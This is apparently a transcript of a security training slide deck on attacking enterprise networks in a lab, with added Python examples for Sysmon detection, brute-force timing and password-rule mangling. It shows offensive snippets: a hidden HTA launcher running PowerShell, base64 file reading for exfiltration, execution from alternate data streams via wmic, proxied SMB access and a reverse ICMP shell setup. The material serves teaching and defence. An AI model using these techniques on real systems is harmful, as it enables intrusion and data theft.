44CON Hacking Enterprises
grep ‘in.security’ /etc/groups
A cyber security consultancy offering specialist technical and training services
Technical
• Vulnerability Assessments
• Penetration Testing
• Red Team Engagements
• Social Engineering Engagements
• Wireless Security Assessments
• Password Audits
• Build Reviews
• Firewall Reviews
© in.security Ltd 2019, all rights reserved
$whoami /all
Will Hunt
• Co-founder of in.security
• 10+ years in cyber
• Assists UK Government
• Hacker, formerly digital forensics
• Trained at various conferences including Black Hat USA/EU
• @Stealthsploit
• https://stealthsploit.com
$whoami /all
Owen Shearing
• Co-founder of in.security
• 14+ years in technical roles
• Trained at various bespoke events and conferences including Black Hat Asia, USA and EU
• CREST CCT
• @rebootuser
• https://rebootuser.com / https://github.com/rebootuser
The LAB
• The MGT network hosts LAB resources for all students to access, including:
• Phishing Platform (Gophish)
• ELK Stack
• CTF Platform
• Kali network (attackers) – this is you!
• The Dev network - routable from attackers subnet
• Two undiscovered, firewalled subnets!
+ a third subnet unlocked after training completes!
[Network diagram: MGT, Dev and Attackers subnets]
Topics…
[Network diagram: MGT, Attackers and Dev subnets]
OSINT techniques
IPv4 / IPv6 discovery & enumeration
Automated vulnerability scanning
Introduction into exploitation frameworks & Mobile devices
Linux enumeration, shells, privilege escalation & post exploitation
P@ssw0rd cracking (Linux)
Windows enumeration
Creating & executing a phishing campaign
P@ssw0rd cracking (Windows)
Windows shells, privilege escalation, post exploitation & info gathering
Defensive monitoring
Restricted environment breakouts
Pivoting and lateral movement
Identifying further targets
Database/application enumeration & exploitation
Domain/trust compromise
Persistence & exfiltration
Our 45min Pwnage Plan…
Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence!
Phishing – Delivery & Payloads
Delivery Examples
• Email, generic ‘campaign’ or targeted attack (spear phishing)
• SMS (Smishing) / Voice (Vishing)
• Web based (malicious/hacked website)
• Malvertising
Payload Examples
• Data collection via hosted forms (credentials, personal/sensitive information, payment details)
• Spoofing and/or content injection targeting legitimate websites
• Embedded code in attached Office documents (Macros, DDE)
• Exploiting vulnerabilities in client-side software (Flash, Acrobat, Java)
Gophish – Users & Groups
Using Gophish for a phishing campaign:
• Targets (Users & Groups tab)
• Email template
• Landing page
• Sending Profile
https://docs.getgophish.com/user-guide
Phishing – HTA Files
• HTML application
• Launched by mshta.exe on Windows
“In short, HTAs pack all the power of Internet Explorer - its object model, performance, rendering power and protocol support - without enforcing the strict security model and user interface of the browser”
https://docs.microsoft.com/en-us/previous-versions//ms536496(v=vs.85)
• A nice overview of HTA/command execution
https://9to5it.com/using-html-applications-as-a-powershell-gui/
Phishing – HTA Files
<script language="VBScript">
window.moveTo -4000, -4000
cmd = "powershell.exe -c Test-Connection 10.133.251.10"
Set runme = CreateObject("Wscript.Shell")
result = runme.Run(cmd, 0, true)
window.close()
</script>
• cmd – the command we are executing
• 0 – window style: hidden
• True – wait for the command to complete before continuing
Our 45min Pwnage Plan… <DEMO> [Phishing]
Monitoring & Alerting
• Elasticsearch Logstash Kibana (ELK)
https://www.elastic.co/products
Kibana – a web-based frontend to allow real-time, visual analysis of collected data in Elasticsearch
Elasticsearch – based on Apache Lucene, a NoSQL (JSON based/document store model) database
Logstash – a tool to intake, process and output log data from various sources
Sysmon
• Part of the Sysinternals suite
https://docs.microsoft.com/en-gb/sysinternals/downloads/sysmon
• A configuration file can be supplied (-i) containing the desired rules
• A great template config from @SwiftOnSecurity
https://github.com/SwiftOnSecurity/sysmon-config
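As an added example (not from the training material or any in.security tool), the Python below scans Sysmon Event ID 1 records, as they might arrive in the ELK stack above, for the process lineage the HTA on the earlier slide produces (mshta.exe launching powershell.exe) and for Office applications launching a shell. The log lines, host name and user name are constructed for the example.

```python
"""Spot HTA- and Office-spawned shells in Sysmon process-creation (Event ID 1) records."""
import json
from pathlib import PureWindowsPath

# Parents that have no business launching a shell or script host on a workstation.
SUSPICIOUS_PARENTS = {"mshta.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children that hand an attacker command execution.
SHELL_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path, so rules are path-independent."""
    return PureWindowsPath(path).name.lower()


def check_event(event: dict):
    """Return an alert dict for one Sysmon record, or None if it is not interesting.

    Only Event ID 1 (process creation) carries the parent/child pair the rule needs.
    """
    if event.get("EventID") != 1:
        return None
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    if parent in SUSPICIOUS_PARENTS and child in SHELL_CHILDREN:
        return {
            "time": event.get("UtcTime"),
            "host": event.get("Computer"),
            "user": event.get("User"),
            "rule": f"{parent} spawned {child}",
            "cmdline": event.get("CommandLine", ""),
        }
    return None


def scan(lines):
    """Run check_event over newline-delimited JSON records, skipping blank or malformed lines."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a truncated line must not abort the whole scan
        alert = check_event(event)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample records (not real telemetry). Field names follow Sysmon's Event ID 1 schema;
# host and user names are invented, the command line is the test payload from the HTA slide.
SAMPLE_LOG = r"""
{"EventID": 1, "UtcTime": "2019-05-01 10:02:11.000", "Computer": "DEV-WS01", "User": "INSEC\\alice", "ParentImage": "C:\\Windows\\System32\\mshta.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -c Test-Connection 10.133.251.10"}
{"EventID": 1, "UtcTime": "2019-05-01 10:02:40.000", "Computer": "DEV-WS01", "User": "INSEC\\alice", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "\"WINWORD.EXE\" invoice.docm"}
{"EventID": 1, "UtcTime": "2019-05-01 10:02:43.000", "Computer": "DEV-WS01", "User": "INSEC\\alice", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"}
{"EventID": 3, "UtcTime": "2019-05-01 10:02:44.000", "Computer": "DEV-WS01", "User": "INSEC\\alice", "Image": "C:\\Windows\\System32\\cmd.exe", "DestinationIp": "10.133.251.10"}
{"EventID": 1, "UtcTime": "2019-05-01 10:05:00.000", "Computer": "DEV-WS01", "User": "INSEC\\alice", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe"}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print(f"{alert['time']} {alert['host']} {alert['user']}: {alert['rule']} -> {alert['cmdline']}")
```

The explorer.exe-launched PowerShell in the last record is deliberately not flagged: the rule keys on the parent, which is what distinguishes the phish from a user opening a console.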
A/V & AMSI
• So, why did our initial phish with the msfvenom-generated HTA fail?
…
• Well, this would be due to Windows Defender / the Antimalware Scan Interface (AMSI)
Our 45min Pwnage Plan… DEMO… [Monitoring]
Unicorn
• Created by TrustedSec / https://github.com/trustedsec/unicorn
• Simple to use, well documented and regularly updated with new techniques/evasion methods
• A number of payloads rely on an msf handler listening on the attacking system (all required configs are generated by the tool)
Our 45min Pwnage Plan… DEMO… [Phishing #2]
Information Gathering
Some questions we’re going to be asking ourselves
• What permissions does the compromised account hold?
• Do we have access to any users with interesting group memberships or delegated rights within the domain?
• What systems/networks does the compromised host have access to?
• […]
• What systems are deemed to hold important/sensitive data?
Information Gathering
PowerView
• Part of the PowerSploit package
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
or, for the latest (version 3, development) build:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
• PowerShell script that provides numerous functions for situational awareness and domain enumeration
• A great ‘cheatsheet’ on functions and usage by @harmj0y
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
• Functions include: Get-DomainUser, Get-DomainGroup, Get-DomainGroupMember, Get-NetDomain, Get-DomainPolicy, Get-DomainTrust, Get-DomainComputer, Find-DomainShare + LOADS more
Our 45min Pwnage Plan… DEMO… [Enumeration]
Password Managers - KeePass
• Password managers/vaults are often used to store privileged credentials and information
• KeePass uses .kdb files (v1) and .kdbx files (v2) to store the database
• We can’t just give the file to a password cracker so we need to extract the hash
• keepass2john can do this and it comes shipped with Kali
• We could then either install KeePass and load the database, or access it directly over the command line using a tool like kpcli
How Can We Exfil The DataZ?
Transferring files using PowerShell
$FileName = "<target_file>"
$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes($FileName))
ReadAllBytes – opens a binary file, reads the contents into a byte array and closes the file*
* https://docs.microsoft.com/en-us/dotnet/api/system.io.file.readallbytes
Our 45min Pwnage Plan… DEMO… [Exfiltration]
Offline Password Cracking
Success depends on a number of factors
• Algorithm complexity
• Password length / complexity
• Hardware (GPU/FPGA/ASIC)
Password cracking process
• Hash the clear text candidate
• Compare to stolen hash
• No match? Start again
• Match = Win!
Brute Force Attack
• Try every possible combination of every character
• Not used 99% of the time…
Pros
• 100% GUARANTEED to crack
Cons
• You likely won’t be around to see it happen!
Brute Force Attack
• Key space = char set ^ length
• 8x NVIDIA GTX 1080 Ti GPUs - Windows passwords @ 513 GH/s* (full 95 char set)
• 8 char NTLM = 3.5 hours
• 9 char NTLM = 14 days
• 10 char NTLM = 3.7 years
• 11 char NTLM = 351 years
• 12 char NTLM = 33,401 years
• 13 char NTLM = 3.2 million years
* https://gist.github.com/epixoip/ace60d09981be09544fdd35005051505
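The figures on this slide follow from the key-space formula. This added Python (not from the slide deck) reproduces the table from the 95-character set and the 513 GH/s NTLM rate, and turns the same arithmetic round to pick a minimum password length that outlasts a given cracking budget.

```python
"""Brute-force cost model from the slide: key space = charset ** length, time = key space / hash rate."""

FULL_CHARSET = 95             # all printable ASCII characters, as on the slide
NTLM_RATE_HS = 513e9          # 513 GH/s NTLM on 8x GTX 1080 Ti, the benchmark the slide cites
SECONDS_PER_YEAR = 365 * 24 * 3600


def key_space(charset_size: int, length: int) -> int:
    """Number of candidates an exhaustive search of exactly `length` characters has to try."""
    return charset_size ** length


def seconds_to_exhaust(length: int, charset_size: int = FULL_CHARSET, rate: float = NTLM_RATE_HS) -> float:
    """Worst-case seconds to try every candidate of the given length at `rate` hashes per second."""
    return key_space(charset_size, length) / rate


def human_duration(seconds: float) -> str:
    """Render seconds in the largest unit that applies, in the rounded style of the slide."""
    for name, size in (("years", SECONDS_PER_YEAR), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            value = seconds / size
            return f"{value:,.0f} {name}" if value >= 1000 else f"{value:.1f} {name}"
    return f"{seconds:.1f} seconds"


def estimate_table(lengths=range(8, 14)):
    """Reproduce the slide's table: password length -> time to exhaust the full 95-char key space."""
    return {n: human_duration(seconds_to_exhaust(n)) for n in lengths}


def min_length_to_survive(target_seconds: float, charset_size: int = FULL_CHARSET,
                          rate: float = NTLM_RATE_HS) -> int:
    """Smallest length whose full key space takes at least `target_seconds` to exhaust.

    This is the defender's use of the same arithmetic: derive a minimum password length
    for a policy from the cracking hardware you assume the adversary has.
    """
    length = 1
    while seconds_to_exhaust(length, charset_size, rate) < target_seconds:
        length += 1
    return length


if __name__ == "__main__":
    for length, duration in estimate_table().items():
        print(f"{length} char NTLM = {duration}")
    print("minimum length to outlast one year on this rig:", min_length_to_survive(SECONDS_PER_YEAR))
```

The 8-character figure comes out at 3.6 hours against the slide's 3.5; the remaining rows match the slide's rounding.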
Dictionary Attack
Wordlist            Rules (applied to “insecurity”)
insecurity          Insecurity
Password            1nsecurity
monkey              ins3curity!
1234567             Ins3cur1ty
Qwerty              in53cur!ty
letmein
• Wordlist contains password candidates
• Most commonly used
• Can be mangled with rules
Pros
• Wordlists contain common passwords
• Mangling addresses the human element
Cons
• Only as good as your dictionary/rules
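An added example, not from the slide deck, of how the “Rules” column is produced: a small engine for a subset of hashcat's rule syntax, applied to the slide's wordlist. The rule lines that reproduce the five mangled forms of “insecurity” were written for this example.

```python
"""Tiny hashcat-style rule engine: mangle the slide's wordlist into the candidates shown beside it."""


def apply_rule(word: str, rule: str) -> str:
    """Apply one rule line (functions separated by spaces) to a word.

    Supported subset of hashcat's rule functions:
      :     no-op          l / u   lower / upper case      c   capitalise
      r     reverse        d       duplicate               $X  append X
      ^X    prepend X      sXY     replace every X with Y  oNX overwrite position N with X
    Positions N are a single character, 0-9 then A-Z, as in hashcat.
    """
    w = word
    for fn in rule.split():
        op = fn[0]
        if op == ":":
            continue
        if op == "l":
            w = w.lower()
        elif op == "u":
            w = w.upper()
        elif op == "c":
            w = w[:1].upper() + w[1:].lower()
        elif op == "r":
            w = w[::-1]
        elif op == "d":
            w = w * 2
        elif op == "$":
            w = w + fn[1]
        elif op == "^":
            w = fn[1] + w
        elif op == "s":
            w = w.replace(fn[1], fn[2])
        elif op == "o":
            pos = int(fn[1], 36)
            if pos < len(w):          # a position past the end leaves the word unchanged
                w = w[:pos] + fn[2] + w[pos + 1:]
        else:
            raise ValueError(f"unsupported rule function {fn!r}")
    return w


# The slide's wordlist, and rule lines (written by hand here) that reproduce its "Rules" column.
WORDLIST = ["insecurity", "Password", "monkey", "1234567", "Qwerty", "letmein"]
RULES = [
    ":",            # the word as-is
    "c",            # Insecurity
    "o01",          # 1nsecurity
    "se3 $!",       # ins3curity!
    "c se3 o71",    # Ins3cur1ty
    "ss5 se3 o7!",  # in53cur!ty
]


def mangle(wordlist, rules):
    """Every rule applied to every word, de-duplicated in first-seen order."""
    seen = {}
    for word in wordlist:
        for rule in rules:
            seen.setdefault(apply_rule(word, rule), None)
    return list(seen)


if __name__ == "__main__":
    for candidate in mangle(WORDLIST, RULES):
        print(candidate)
```

Six rules turn a six-word list into about thirty candidates; this multiplication, not the base wordlist, is what makes “Ins3cur1ty”-style passwords fall quickly.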
Our 45min Pwnage Plan… DEMO… [Cracking]
Routing in Metasploit
• Traffic to target networks can be routed over existing sessions…
• To add a route
route add <$network> <$mask> <$sessionID>
SOCKS Proxies
• A server that can establish a connection to a destination on behalf of a client
• Metasploit SOCKS modules
auxiliary/server/socks4a
auxiliary/server/socks5
“This module provides a socksx proxy server that uses the built-in Metasploit routing to relay connections” *
• This functionality allows programs external to Metasploit to utilise configured routes within msf and gain access to the target system(s)/network(s)
…with the help of proxychains
SOCKS Proxies & Proxychains
• Proxychains / http://proxychains.sourceforge.net
• Allows/supports TCP (not UDP - with the exception of DNS)
• Used to allow *any program to run through a SOCKS proxy
• Configuration file @ /etc/proxychains.conf
• Then run a program through the proxy!
proxychains smbclient -W insec-xxxx.local //10.133.50.xxx/<$fileshare> -U <$targetUser>%<$password>
Our 45min Pwnage Plan… DEMO… [SOCKS & Shellz]
Hiding Data
• Alternate Data Streams (ADS) allow one file system entry to contain multiple data sets (NTFS only)
• Original file is always the ‘main’ stream, additional streams are appended to the filename and are colon delimited
File.txt
File.txt:secretdata.txt:$DATA
File.txt:shell.exe:$DATA
• One option to trigger – wmic process call create File.txt:shell.exe
• A nice article by Oddvar Moe on executing files from ADS
https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Exfiltrating Data Over ICMP
• ICMP doesn’t use ports (it has types and codes instead) and is often left enabled, forgotten and not monitored
• Overcomes network egress issues when the usual channels are blocked
• icmpsh is a reverse ICMP shell (https://github.com/inquisb/icmpsh)
• Server works in C, Perl, Python
• Client is Win32
• We have to stop the attacking host’s kernel answering ICMP echo requests itself and then start the ICMP server
sysctl -w net.ipv4.icmp_echo_ignore_all=1
Our 45min-ish Pwnage Plan… DEMO… [ADS & OOB ICMP… if time permits!]
Our 45min Pwnage Plan… </DEMO>
Much, Much More…
June 6th/7th @44CON
https://44con.com/44con-training/hacking-enterprises-exploiting-insecurity/

More Related Content

PPTX
How to write secure code
PPTX
Red teaming in the cloud
PDF
Hacking SIP Like a Boss!
PDF
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
PDF
Activated Charcoal - Making Sense of Endpoint Data
PDF
5 step plan to securing your APIs
PDF
VoIP Wars: Attack of the Cisco Phones
PDF
How to write secure code
Red teaming in the cloud
Hacking SIP Like a Boss!
Avoiding Sophisticated Targeted Breach Critical Guidance Healthcare
Activated Charcoal - Making Sense of Endpoint Data
5 step plan to securing your APIs
VoIP Wars: Attack of the Cisco Phones

What's hot (19)

PPTX
OWASP Atlanta 2018: Forensics as a Service
PDF
VoIP Wars: The Phreakers Awaken
PDF
VoIP Wars: Destroying Jar Jar Lync (Filtered version)
PPTX
End-to-Eend security with Palo Alto Networks (Onur Kasap, Palo Alto Networks)
PDF
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
PPT
Presentacion Palo Alto Networks
PDF
VMworld 2013: VMware NSX with Next-Generation Security by Palo Alto Networks
PDF
F5 DDoS Protection
PDF
F5 Web Application Security
PPTX
Prowler: BlackHat Europe Arsenal 2018
PPTX
Why choose pan
PPTX
Palo Alto Networks 28.5.2013
PDF
F5 TMOS v13.0
PDF
Palo Alto Networks y la tecnología de Next Generation Firewall
PPTX
VoIP – vulnerabilities and attacks
PDF
Departed Communications: Learn the ways to smash them!
PDF
MBFuzzer : MITM Fuzzing for Mobile Applications
PDF
Preparing for the Imminent Terabit DDoS Attack
PDF
BlackHat Hacking - Hacking VoIP.
OWASP Atlanta 2018: Forensics as a Service
VoIP Wars: The Phreakers Awaken
VoIP Wars: Destroying Jar Jar Lync (Filtered version)
End-to-Eend security with Palo Alto Networks (Onur Kasap, Palo Alto Networks)
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)
Presentacion Palo Alto Networks
VMworld 2013: VMware NSX with Next-Generation Security by Palo Alto Networks
F5 DDoS Protection
F5 Web Application Security
Prowler: BlackHat Europe Arsenal 2018
Why choose pan
Palo Alto Networks 28.5.2013
F5 TMOS v13.0
Palo Alto Networks y la tecnología de Next Generation Firewall
VoIP – vulnerabilities and attacks
Departed Communications: Learn the ways to smash them!
MBFuzzer : MITM Fuzzing for Mobile Applications
Preparing for the Imminent Terabit DDoS Attack
BlackHat Hacking - Hacking VoIP.

Similar to 44CON Hacking Enterprises (20)

PDF
Zero Day Malware Detection/Prevention Using Open Source Software
PPTX
Application security meetup k8_s security with zero trust_29072021
PDF
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
PDF
Guide of authentication and authorization for cloud native applications with ...
PPTX
Meeting rooms are talking. Are you listening
PDF
The Whys and Hows of Deploying a Secure RPA Solution
PPTX
Man in the Cloud Attacks
PPTX
Rome 2017: Building advanced voice assistants and chat bots
PPTX
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
PPTX
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
PDF
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
PDF
IT Camp 19: Top Azure security fails and how to avoid them
PDF
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
PDF
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
PDF
Emulators as an Emerging Best Practice for API Providers
PDF
PKI in DevOps: How to Deploy Certificate Automation within CI/CD
PPTX
Meeting rooms are talking! are you listening?
PDF
Keeping your collaboration safe while working remotely
PDF
BRKSEC-3144.pdf
PDF
Secure coding guidelines
Zero Day Malware Detection/Prevention Using Open Source Software
Application security meetup k8_s security with zero trust_29072021
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Guide of authentication and authorization for cloud native applications with ...
Meeting rooms are talking. Are you listening
The Whys and Hows of Deploying a Secure RPA Solution
Man in the Cloud Attacks
Rome 2017: Building advanced voice assistants and chat bots
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Stève Sfartz - Meeting rooms are talking! Are you listening? - Codemotion Ber...
Introduction to Mobile Application Security - Techcity 2015 (Vilnius)
IT Camp 19: Top Azure security fails and how to avoid them
Jeremiah O'Connor & David Maynor - Chasing the Crypto Workshop: Tracking Fina...
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
Emulators as an Emerging Best Practice for API Providers
PKI in DevOps: How to Deploy Certificate Automation within CI/CD
Meeting rooms are talking! are you listening?
Keeping your collaboration safe while working remotely
BRKSEC-3144.pdf
Secure coding guidelines

Recently uploaded (20)

PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
PPT
Module 1.ppt Iot fundamentals and Architecture
PPTX
Programs and apps: productivity, graphics, security and other tools
PDF
NewMind AI Weekly Chronicles - August'25-Week II
PDF
Architecture types and enterprise applications.pdf
PDF
TrustArc Webinar - Click, Consent, Trust: Winning the Privacy Game
PDF
2021 HotChips TSMC Packaging Technologies for Chiplets and 3D_0819 publish_pu...
PDF
A contest of sentiment analysis: k-nearest neighbor versus neural network
PDF
Zenith AI: Advanced Artificial Intelligence
PDF
Hindi spoken digit analysis for native and non-native speakers
PPTX
observCloud-Native Containerability and monitoring.pptx
PDF
NewMind AI Weekly Chronicles – August ’25 Week III
PDF
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PDF
Developing a website for English-speaking practice to English as a foreign la...
PDF
A novel scalable deep ensemble learning framework for big data classification...
PDF
Getting started with AI Agents and Multi-Agent Systems
PDF
project resource management chapter-09.pdf
PDF
Assigned Numbers - 2025 - Bluetooth® Document
PPTX
MicrosoftCybserSecurityReferenceArchitecture-April-2025.pptx
PPTX
O2C Customer Invoices to Receipt V15A.pptx
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Module 1.ppt Iot fundamentals and Architecture
Programs and apps: productivity, graphics, security and other tools
NewMind AI Weekly Chronicles - August'25-Week II
Architecture types and enterprise applications.pdf
TrustArc Webinar - Click, Consent, Trust: Winning the Privacy Game
2021 HotChips TSMC Packaging Technologies for Chiplets and 3D_0819 publish_pu...
A contest of sentiment analysis: k-nearest neighbor versus neural network
Zenith AI: Advanced Artificial Intelligence
Hindi spoken digit analysis for native and non-native speakers
observCloud-Native Containerability and monitoring.pptx
NewMind AI Weekly Chronicles – August ’25 Week III
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
Developing a website for English-speaking practice to English as a foreign la...
A novel scalable deep ensemble learning framework for big data classification...
Getting started with AI Agents and Multi-Agent Systems
project resource management chapter-09.pdf
Assigned Numbers - 2025 - Bluetooth® Document
MicrosoftCybserSecurityReferenceArchitecture-April-2025.pptx
O2C Customer Invoices to Receipt V15A.pptx

44CON Hacking Enterprises

  • 2. grep ‘in.security’ /etc/groups A cyber security consultancy offering specialist technical and training services Technical • Vulnerability Assessments • Penetration Testing • Red Team Engagements • Social Engineering Engagements • Wireless Security Assessments • Password Audits • Build Reviews • Firewall Reviews © in.security Ltd 2019, all rights reserved
  • 3. $whoami /all Will Hunt • Co-founder of in.security • 10+ years in cyber • Assists UK Government • Hacker, formerly digital forensics • Trained at various conferences including Black Hat USA/EU • @Stealthsploit • https://stealthsploit.com © in.security Ltd 2019, all rights reserved
  • 4. $whoami /all Owen Shearing • Co-founder of in.security • 14+ years in technical roles • Trained at various bespoke events and conferences including Black Hat Asia, USA and EU • CREST CCT • @rebootuser • https://rebootuser.com / https://github.com/rebootuser © in.security Ltd 2019, all rights reserved
  • 5. The LAB The LAB • The MGT network hosts LAB resources for all students to access, including: • Phishing Platform (Gophish) • ELK Stack • CTF Platform • Kali network (attackers) – this is you! • The Dev network - routable from attackers subnet • Two undiscovered, firewalled subnets! + a third subnet unlocked after training completes! © in.security Ltd 2019, all rights reserved MGT Dev Attackers
  • 6. © in.security Ltd 2019, all rights reserved Topics… © in.security Ltd 2019, all rights reserved MGT A:ackers Dev OSINT techniques IPv4 / IPv6 discovery & enumeration Automated vulnerability scanning Introduction into exploitation frameworks & Mobile devices Linux enumeration, shells, privilege escalation & post exploitation P@ssw0rd cracking (Linux) Windows enumeration Creating & executing a phishing campaign P@ssw0rd cracking (Windows) Windows shells, privilege escalation, post exploitation & info gathering Defensive monitoring Restricted environment breakouts Pivoting and lateral movement Identifying further targets Database/application enumeration & exploitation Domain/trust compromise Persistence & exfiltration
  • 7. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 8. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 9. Phishing – Delivery & Payloads Delivery Examples • Email, generic ‘campaign’ or targeted attack (spear phishing) • SMS (Smishing) / Voice (Vishing) • Web based (malicious/hacked website) • Malvertising Payload Examples • Data collection via hosted forms (credentials, personal/sensitive information, payment details) • Spoofing and/or content injection targeting legitimate websites • Embedded code in attached Office documents (Macros, DDE) • Exploiting vulnerabilities in client-side software (Flash, Acrobat, Java) © in.security Ltd 2019, all rights reserved
  • 10. Gophish – Users & Groups Using Gophish for a phishing campaign: • Targets (Users & Groups tab) • Email template • Landing page • Sending Profile https://docs.getgophish.com/user-guide © in.security Ltd 2019, all rights reserved
  • 11. Phishing – HTA Files • HTML application • Launched by mshta.exe on Windows “In short, HTAs pack all the power of Internet Explorer - its object model, performance, rendering power and protocol support - without enforcing the strict security model and user interface of the browser” https://docs.microsoft.com/en-us/previous-versions//ms536496(v=vs.85) • A nice overview of HTA/command execution https://9to5it.com/using-html-applications-as-a-powershell-gui/ © in.security Ltd 2019, all rights reserved
  • 12. Phishing – HTA Files <script language="VBScript"> window.moveTo -4000, -4000 cmd = "powershell.exe -c Test-Connection 10.133.251.10" Set runme = CreateObject("Wscript.Shell") result = runme.Run(cmd, 0, true) window.close() </script> • Cmd – command we are executing • 0 – set to hidden • True - wait for command to complete before continuing © in.security Ltd 2019, all rights reserved
  • 13. Our 45min Pwnage Plan… <DEMO> © in.security Ltd 2019, all rights reserved [Phishing]
  • 14. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 15. Monitoring & Alerting • Elasticsearch Logstash Kibanna (ELK) https://www.elastic.co/products © in.security Ltd 2019, all rights reserved Kibana - a web-based frontend to allow real-time, visual analysis of collected data in Elasticsearch Elasticsearch – based on Apache Lucene, a NoSQL (JSON based/document store model) database Logstash – a tool to intake, process and output log data from various sources
  • 16. Monitoring & Alerting • Elasticsearch Logstash Kibanna (ELK) https://www.elastic.co/products © in.security Ltd 2019, all rights reserved Kibana - a web-based frontend to allow real-time, visual analysis of collected data in Elasticsearch Elasticsearch – based on Apache Lucene, a NoSQL (JSON based/document store model) database Logstash – a tool to intake, process and output log data from various sources
  • 17. Monitoring & Alerting • Elasticsearch Logstash Kibanna (ELK) https://www.elastic.co/products © in.security Ltd 2019, all rights reserved Kibana - a web-based frontend to allow real-time, visual analysis of collected data in Elasticsearch Elasticsearch – based on Apache Lucene, a NoSQL (JSON based/document store model) database Logstash – a tool to intake, process and output log data from various sources
  • 18. Sysmon • Part of the Sysinternals suite https://docs.microsoft.com/en-gb/sysinternals/downloads/sysmon • A configuration file can be supplied (-i) containing the desired rules • A great template config from @SwiftOnSecurity https://github.com/SwiftOnSecurity/sysmon-config © in.security Ltd 2019, all rights reserved
  • 19. A/V & AMSI • So, why did our initial phish with msfvenom generated HTA fail? …. • Well, this would be due to Windows Defender/Antimalware Scan Interface © in.security Ltd 2019, all rights reserved
  • 20. Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Monitoring]
  • 21. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 22. Unicorn • Created by TrustedSec / https://github.com/trustedsec/unicorn • Simple to use, well documented and regularly updated with new techniques/evasion methods • A number of payloads rely on a msf handler listening on the attacking system (all required configs are generated by the tool) © in.security Ltd 2019, all rights reserved
  • 23. Our 45min Pwnage Plan… DEMO… © in.security Ltd 2019, all rights reserved [Phishing #2]
  • 24. Our 45min Pwnage Plan… Phish > Kibana > Phish#2 > Enumeration > Exfiltration > Password Cr@cK5 > SOCKS Proxies > OOB Persistence! © in.security Ltd 2019, all rights reserved
  • 25. Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? © in.security Ltd 2019, all rights reserved
  • 26. Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? • Do we have access to any users with interesting group memberships or delegated rights within the domain? © in.security Ltd 2019, all rights reserved
  • 27. Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? • Do we have access to any users with interesting group memberships or delegated rights within the domain? • What systems/networks does the compromised host have access to? © in.security Ltd 2019, all rights reserved
  • 28. Information Gathering Some questions we’re going to be asking ourselves • What permissions does the compromised account hold? • Do we have access to any users with interesting group memberships or delegated rights within the domain? • What systems/networks does the compromised host have access to? • [… • …] • What systems are deemed to hold important/sensitive data? © in.security Ltd 2019, all rights reserved
